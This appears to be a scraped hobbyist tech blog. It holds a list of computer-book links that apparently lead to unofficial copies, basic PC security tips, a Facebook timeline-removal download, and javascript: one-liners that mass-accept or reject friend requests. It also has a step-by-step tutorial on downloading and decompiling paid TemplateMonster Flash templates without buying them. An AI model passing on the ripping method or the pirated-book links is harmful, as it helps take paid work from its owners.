40
Curious about the internet?
http://www.parsian.net/set1252/pages/books.htm

41
Dan appleman's developing activeX components with Visual Basic 5
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

42
Dan appleman's developing activex components with Visual Basic 5.0
http://www.parsian.net/set1252/pages/books.htm

43
Data structures CMSC420/Mount, David
www.oopweb.com

44
Database developer's guide with visual basic 4, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

45
Database developer's guide with Visual Basic 4, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

46
Database developer's guide with Visual C++ 4, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

47
Database developer's guide with Visual C++ 4, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

48
Design and analysis of computer algorithms CMSC451/Mount, David
www.oopweb.com

49
Designing implementing Microsoft internet information server
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

50
Designing implementing Microsoft proxy server
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

51
Developing for netscape one
http://www.parsian.net/set1252/pages/books.htm

52
Developing intranet applications with java
http://www.parsian.net/set1252/pages/books.htm

53
Developing personal oracle 7 for windows 95 applications
http://www.parsian.net/set1252/pages/books.htm

54
Developing personal Oracle 7 for windows 95 applications
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

55
Developing professional java applets
http://www.parsian.net/set1252/pages/books.htm

56
Developing professional java applets
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

57
DNS and BIND
http://www.hk8.org/old_web/

58
Doing objects with VB.NET and C#
http://vbwire.com/nl?6814

59
EAI/BPM Evaluation Series: IBM WebSphere MQ Workflow v3.3.2 & EAI Suite by
> Middleware Technology Evaluation Series, Phong Tran & Jeffrey Gosper
http://www.cmis.csiro.au/mte/reports/BPM_IBMwebsphereMQ332.htm

60
Effective AWK programming
http://book.onairweb.net/computer/os/shell/Effective_AWK_Programming/

61
Enterprise javabeans, 2nd.ed.
http://www.hk8.org/old_web/

62
Exploring java
http://www.hk8.org/old_web/

63
GNOME/Sheets, John
www.oopweb.com

64
Graph theory/Prof. Even
www.oopweb.com

65
Hacking java
http://www.parsian.net/set1252/pages/books.htm

66
How intranets work
http://www.parsian.net/set1252/pages/books.htm

67
How intranets work
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

68
How to program visual basic 5.0
http://www.parsian.net/set1252/pages/books.htm

69
How to use HTML 3.2
http://www.parsian.net/set1252/pages/books.htm

70
Html : The definitive guide
http://www.hk8.org/old_web/

71
HTML 3.2 & CGI unleashed
http://www.parsian.net/set1252/pages/books.htm

72
HTML 3.2 and CGI professional reference edition unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

73
HTML by example
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

74
Internet firewall
http://www.hk8.org/old_web/

75
Intranets unleashed
http://www.parsian.net/set1252/pages/books.htm

76
Introduction to object-oriented programming using C++/Muller, Peter
www.oopweb.com

77
Introduction to programming using Java/Eck, David
www.oopweb.com

78
Introduction to socket programming
http://book.onairweb.net/computer/network/An_Introduction_to_Socket_Programming/

79
Java 1.1 unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

80
Java 1.1 unleashed, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

81
Java 1.1 unleashed, 3rd.ed.
http://www.parsian.net/set1252/pages/books.htm

82
Java 114 documentation
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

83
Java AWT reference
http://www.hk8.org/old_web/

84
Java by example
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

85
Java developer's guide
http://www.parsian.net/set1252/pages/books.htm

86
Java developer's guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

87
Java developer's reference
http://www.parsian.net/set1252/pages/books.htm

88
Java developer's reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

89
Java Distributed computing
http://www.hk8.org/old_web/

90
Java enterprise
http://www.hk8.org/old_web/

91
Java enterprise in a nutshell
http://www.hk8.org/old_web/

92
Java foundation classes in a nutshell
http://www.hk8.org/old_web/

93
Java fundamental classes reference
http://www.hk8.org/old_web/

94
Java in a nutshell
http://www.hk8.org/old_web/

95
Java in a nutshell, 3rd.ed.
http://www.hk8.org/old_web/

96
Java language reference
http://www.hk8.org/old_web/

97
Java security
http://www.hk8.org/old_web/

98
Java servlet programming
http://www.hk8.org/old_web/

99
Java unleashed
http://www.parsian.net/set1252/pages/books.htm

100
Java unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

101
Java, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

102
_JavaScript : the definitive guide
http://www.hk8.org/old_web/

103
_Javascript manual of style
http://www.parsian.net/set1252/pages/books.htm

104
_Javascript manual of style
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

105
Josh's GNU Linux Guide/Joshua
http://book.onairweb.net/computer/os/linux/Administration/Josh's_GNU_Linux_Guide/

106
Late night activex
http://www.parsian.net/set1252/pages/books.htm

107
Late night activeX
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

108
Laura lemay's 3D graphics in and VRML 2
http://www.parsian.net/set1252/pages/books.htm

109
Laura lemay's activex and _VBScript
http://www.parsian.net/set1252/pages/books.htm

110
Laura lemay's graphics and web page design
http://www.parsian.net/set1252/pages/books.htm

111
Laura lemay's guide to sizzling websites design
http://www.parsian.net/set1252/pages/books.htm

112
Laura lemay's _javascript 1.1
http://www.parsian.net/set1252/pages/books.htm

113
Laura lemay's web workshop activex and _VBScript
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

114
Laura lemay's web workshop Graphics web page design
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

115
Laura lemay's web workshop _javascript
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

116
Learning perl
http://www.hk8.org/old_web/

117
Learning perl on win32
http://www.hk8.org/old_web/

118
Learning the kornshell
http://www.hk8.org/old_web/

119
Learning unix
http://www.hk8.org/old_web/

120
Learning vi
http://www.hk8.org/old_web/

121
Linux from Scratch/Beekmans, Gerard
http://book.onairweb.net/computer/os/linux/Administration/Linux_From_Scratch/

122
Linux in a nutshell, 3rd.ed.
http://www.hk8.org/old_web/

123
Linux kernel/Rusling, David
www.oopweb.com

124
Linux network administrator's guide/Dawson, Terry
www.oopweb.com

125
Linux system administrator's survival guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

126
MAPI, SAPI and TAPI developer's guide
http://www.parsian.net/set1252/pages/books.htm

127
Mastering access 95 development
http://www.parsian.net/set1252/pages/books.htm

128
Microsoft access 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

129
Microsoft access 97 quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

130
Microsoft backoffice 2 unleashed
http://www.parsian.net/set1252/pages/books.htm

131
Microsoft excel 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

132
Microsoft excel 97 quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

133
Microsoft exchange server survival guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

134
Microsoft frontpage unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

135
Microsoft word 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

136
Microsoft word 97 quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

137
Microsoft works 4.5 6-In-1
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

138
More than 100 full-text e-books
http://www.allfreetech.com/EBookCategory.asp

139
Ms backoffice administrator's survival guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

140
Ms backoffice unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

141
Mysql and msql
http://www.hk8.org/old_web/

142
Netscape plug-ins developer's kit
http://www.parsian.net/set1252/pages/books.htm

143
Official gamelan java directory
http://www.parsian.net/set1252/pages/books.htm

144
Oracle built-in packages
http://www.hk8.org/old_web/

145
Oracle PL/SQL built-in pocket reference
http://www.hk8.org/old_web/

146
Oracle PL/SQL language pocket reference
http://www.hk8.org/old_web/

147
Oracle PL/SQL programming guide to Oracle 8 features
http://www.hk8.org/old_web/

148
Oracle PL/SQL programming, 2nd.ed.
http://www.hk8.org/old_web/

149
Oracle unleashed
http://www.parsian.net/set1252/pages/books.htm

150
Oracle unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

151
Oracle web applications PL/SQL developer's introduction
http://www.hk8.org/old_web/

152
Patterns of enterprise application architecture/Fowler, Martin
http://www.awprofessional.com/catalog/product.asp?product_id={574D77DF-6ED2-BC5-A6A8-02E59CA7482D}

153
PC week : the intranet advantage
http://www.parsian.net/set1252/pages/books.htm

154
Perl 5 by example
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

155
Perl 5 quick reference
http://www.parsian.net/set1252/pages/books.htm

156
Perl 5 unleashed
http://www.parsian.net/set1252/pages/books.htm

157
Perl 5.0 CGI web pages
http://www.parsian.net/set1252/pages/books.htm

158
Perl cookbook
http://www.hk8.org/old_web/

159
Perl for system administration
http://www.hk8.org/old_web/

160
Perl in a nutshell
http://www.hk8.org/old_web/

161
Perl quick reference
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

162
Peter norton's complete guide to windows NT 4 workstations
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

163
Presenting activex
http://www.parsian.net/set1252/pages/books.htm

164
Presenting activex
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

165
Presenting javabeans
http://www.parsian.net/set1252/pages/books.htm

166
Presenting javabeans
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

167
Programming perl
http://www.hk8.org/old_web/

168
Programming perl, 3rd.ed.
http://www.hk8.org/old_web/

169
Programming the Perl DBI
http://www.hk8.org/old_web/

170
Red hat linux unleashed
http://www.parsian.net/set1252/pages/books.htm

171
Running a perfect intranet
http://www.parsian.net/set1252/pages/books.htm

172
Running Linux, 3rd.ed.
http://www.hk8.org/old_web/

173
Sams teach yourself java 1.1 in 24 hours/
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_1.1_Programming_in_24_Hours

174
Sams Teach yourself java in 21 days/Lemay, Laura
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_in_21_Days/

175
Sams teach yourself linux in 24 hours/Ball, Bill
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Linux_in_24%20Hours/

176
Sams teach yourself shell programming in 24 hours
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Shell_Programming_in_24_Hours/

177
Sams teach yourself TCP/IP in 14 days
http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_TCP-IP_in_14_Days(SE)/

178
Sed and awk
http://www.hk8.org/old_web/

179
Sendmail
http://www.hk8.org/old_web/

180
Sendmail desktop reference
http://www.hk8.org/old_web/

181
Slackware linux unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

182
Special edition using java, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

183
Special edition using _javascript
http://www.parsian.net/set1252/pages/books.htm

184
Special edition using _javascript
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

185
Special edition using _Jscript
http://www.parsian.net/set1252/pages/books.htm

186
Special edition using lotus notes and domino 4.5
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

187
Special edition using Microsoft SQL server 6.5, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

188
Special edition using Microsoft visual Interdev
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

189
Special edition using perl 5 for web programming
http://www.parsian.net/set1252/pages/books.htm

190
Special edition using perl for web programming
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

191
Special edition using Visual Basic 4
http://www.parsian.net/set1252/pages/books.htm

192
TCP/IP
http://www.hk8.org/old_web/

193
Teach yourself activex programming in 21 days
http://www.parsian.net/set1252/pages/books.htm

194
Teach yourself C++ in 21 days
http://www.parsian.net/set1252/pages/books.htm

195
Teach yourself C++ in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

196
Teach yourself CGI programming with Perl 5 in a week
http://www.parsian.net/set1252/pages/books.htm

197
Teach yourself database programming with VB5 in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

198
Teach yourself database programming with visual basic 5 in 21 days
http://www.parsian.net/set1252/pages/books.htm

199
Teach yourself HTML 3.2 in 24 hours
http://www.parsian.net/set1252/pages/books.htm

200
Teach yourself HTML 3.2 in 24 hours
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

201
Teach yourself internet game programming with java in 21 days
http://www.parsian.net/set1252/pages/books.htm

202
Teach yourself java 1.1 programming in 24 hours
http://www.parsian.net/set1252/pages/books.htm

203
Teach yourself jave in café in 21 days
http://www.parsian.net/set1252/pages/books.tm

204
Teach yourself Microsoft visual Interdev in 21 days
http://www.parsian.net/set1252/pages/books.htm

205
Teach yourself Microsoft visual Interdev in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

206
Teach yourself oracle 8 in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

207
Teach yourself perl 5 in 21 days
http://www.parsian.net/set1252/pages/books.htm

208
Teach yourself perl 5 in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

209
Teach yourself SQL in 21 days
http://www.parsian.net/set1252/pages/books.htm

210
Teach yourself SQL in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

211
Teach yourself TCP/IP in 14 days
http://www.parsian.net/set1252/pages/books.htm

212
Teach yourself TCP/IP in 14 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

213
Teach yourself the Internet in 24 hours
http://www.parsian.net/set1252/pages/books.htm

214
Teach yourself the internet in 24 hours
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

215
Teach yourself _VBScript in 21 days
http://www.parsian.net/set1252/pages/books.htm

216
Teach yourself _VBScript in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

217
Teach yourself visual basic 5 in 24 hours
http://www.parsian.net/set1252/pages/books.htm

218
Teach yourself Visual Basic 5 in 24 hours
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

219
Teach yourself Visual J++ in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

220
Teach yourself web publishing with HTML 3.2 in 14 days
http://www.parsian.net/set1252/pages/books.htm

221
Teach yourself web publishing with HTML in 14 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

222
Thinking in C++
http://www.mindview.net/Books

223
Thinking in C++/Eckel, Bruce - Vol.I, 2nd.ed.
www.oopweb.com

224
Thinking in C++/Eckel, Bruce - Vol.II, 2nd.ed.
www.oopweb.com

225
Thinking in Enterprise Java
http://www.mindview.net/Books

226
Thinking in Java, 2nd.ed.
www.oopweb.com

227
Thinking in Java, 3rd.ed. (pdf)
http://www.mindview.net/Books

228
Tricks of the internet gurus
http://www.parsian.net/set1252/pages/books.htm

229
Tricks of the java programming gurus
http://www.parsian.net/set1252/pages/books.htm

230
Unix and internet security
http://www.hk8.org/old_web/

231
Unix hints and hacks/Waingrow, Kirk
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Hints_&_Hacks/19270001..htm

232
Unix in a nutshell
http://www.hk8.org/old_web/

233
Unix kornshell quick reference
http://book.onairweb.net/computer/os/shell/Unix_KornShell_Quick_Reference/kornShell.html

234
Unix power tools
http://www.hk8.org/old_web/

235
Unix shell guide
http://book.onairweb.net/computer/os/shell/The_UNIX_Shell_Guide/

236
Unix unleashed
http://www.parsian.net/set1252/pages/books.htm

237
Unix unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

238
Unix unleashed Internet Ed./Burk, Robin
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed(Internet_Edition)/fm.htm

239
Unix unleashed, System administrator's Edition
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed_System_Administrator's_Edition/toc.htm

240
Unix Unleashed/Sams Publication
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed/

241
Upgrading PCs illustrated
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

242
Using windows NT workstation 4.0
http://www.parsian.net/set1252/pages/books.htm

243
_VBScript unleashed
http://www.parsian.net/set1252/pages/books.htm

244
_Vbscript unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

245
Visual basic 4 in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

246
Visual basic 4 unleashed
http://www.parsian.net/set1252/pages/books.htm

247
Visual Basic 5 night school
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

248
Visual basic programming in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

249
Visual Basic programming in 12 easy lessons
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

250
Visual C++ 4 unleashed
http://www.parsian.net/set1252/pages/books.htm

251
Visual C++ programming in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

252
Web database developer's guide with visual basic 5
http://www.parsian.net/set1252/pages/books.htm

253
Web database developer's guide with visual basic 5
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

254
Web programming desktop reference 6-in-1
http://www.parsian.net/set1252/pages/books.htm

i am not guaranteed about all the links working but still many other links are working so you can find many ebooks.

Top 10 Fast And Free Security Enhancements

0 Comments

Before you gettin started to security your should be careful of these steps:


1. Check Windows Update and Office Update regularly (Updates):


Have your Office CD ready. Windows Me, 2000, and XP even win7 users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.


2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.


3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.


4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Startup Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.


5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And double check your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable email security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."


Hope You Have Got What i want to show.

How to Rip (TM) Dynamic Flash Templates

0 Comments
by : h4ck3r jutt



What you need:


1)Sample dynamic flash template from TM website

2)Sothink SWF Decompiler

3)Macromedia Flash

4)Your Brain :p


Steps:


1. Browse or search your favorite dynamic flash template in TM website. If you got one.. click the "view" link and new window will open with dynamic flash.. loading...

2. If the movie fully loaded,

Click View -> Source in your browser to bring the source code of the current page and in the source code, search for "IFRAME" and you will see the iframe page. In this example were going to try the 7045 dynamic template. get the URL(ex.http://images.templatemonster.com/screenshots/7000/7045.html) then paste it to your browser... easy eh? wait! don't be too excited... erase the .html and change it to swf then press enter then you'll see the flash movie again icon_smile.gif.

3. Copy the URL and download that SWF file.. use your favorite download manager.. mine I used flashget icon_smile.gif


NOTE: don't close the browser we may need that later on.

4. Open your Sothink SWF decompiler..:

click "Quick Open" then browse where you download your SWF/movie file. Click Export FLA to export your SWF to FLA, in short, save it as FLA icon_smile.gif

5. Open your Macromedia FLash and open the saved FLA file.

Press Control+Enter or publish the file... then WUFFF! the output window will come up with "Error opening URL something something..." don't panic, that error will help you where to get the remaining files.

6. Copy the first error,example: "7045_main.html" then go back to your browser and replace the 7045.swf to 7045_main.html press enter and you'll see a lot of text...text icon_lol.gif that text are your contents...



NOTE: when you save the remaining files don't forget to save with underscore sign (_) in the front on the file without the TM item number (e.g. 7045) if it is html save it as "_main.html" and same with the image save it as "_works1.jpg" save them where you save the FLA and SWF files. Continue browsing the file inside Flash application so you can track the remaining files... do the same until you finish downloading all the remaining the files.

Create your free smf Forum 100% working

1 Comments
Assalam-0-Alaikum ,




So We Need To Download filezilla software First to Perform Below Method: from here.


Steps :


1) Make an free hosting acc like 000webhost.com or byethost.com or 1freehosting.com or any hosting site you have ..to make it easier for you i have wrote article to make free hosting acc Here

i have my own acc so i will make a new domain and fall to next step!!

2)Second is to download latest smf version from:



3) After Downloading zip file extract it and upload all files in root or separate directory

4)After uploading make your database and run :


www.sitename.com/smf/install.php (if you have made another directory)

www.sitename.com/install.php (if you have uploaded files in root directory)

i will use the second link method because i have uploaded files in root directory.,now fill out every field of the installation process carefully.

5)Now give your forum a final touch up ^.^

Now goto admin>> and manage everything of forum from there and you have your own Forum now :p

Video Tutorial :




Join Us For Future Updates article by: h4ck3r jutt

ALLAH HAFIZ!!

Remove F.B timeline from Chrome And Firefox

0 Comments



Today i am going to show you how to remove the annoying facebook timeline from your profile very easy and working method i have found from somewhere its helpful so i decided to share :)


STEP:



1)Download files i have uploaded from:


Link1     or      Link2     or      Link3     or      Link4     or      Link5     

or      [MIRROR]

2) Extract Them and install google chrome extension and firefox add on by dropping it on new tab.

3) Now Refresh And Enjoy Your Old Profile........ :D

Video Tutorial Is Here :





Face Any Problem or have any issue just comment , if you liked just subscribe Us For Future Updates.

Facebook Accept Or Reject All Friend Requests

2 Comments


My Friends and Our followers Have said that many times we got friend requests too much that we feel annoying to accept or reject anyone request. So I have Coded something special For You Guys ... here is a java script to Accept and another Script To Reject all the friend request at the same time...










NOTE: this method is very helpful when you joined facebook after many time... and you got 1500 friend requests :D w0w ignore them all stupids by this method :p.




*Method:




1)   Visit:

http://www.facebook.com/reqs.php


2)  Copy The Following Code:
For Accepting:



javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);


For Rejecting:



javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);



3) Paste This Code In The Address Bar Of The Page You Opened In The First Step..


4) Now Just Wait And Let The Script Work!!



Note For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It..
 

About Admin

I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on .


| Solve Byte © 2011 - 2016. All Rights Reserved | Back To Top |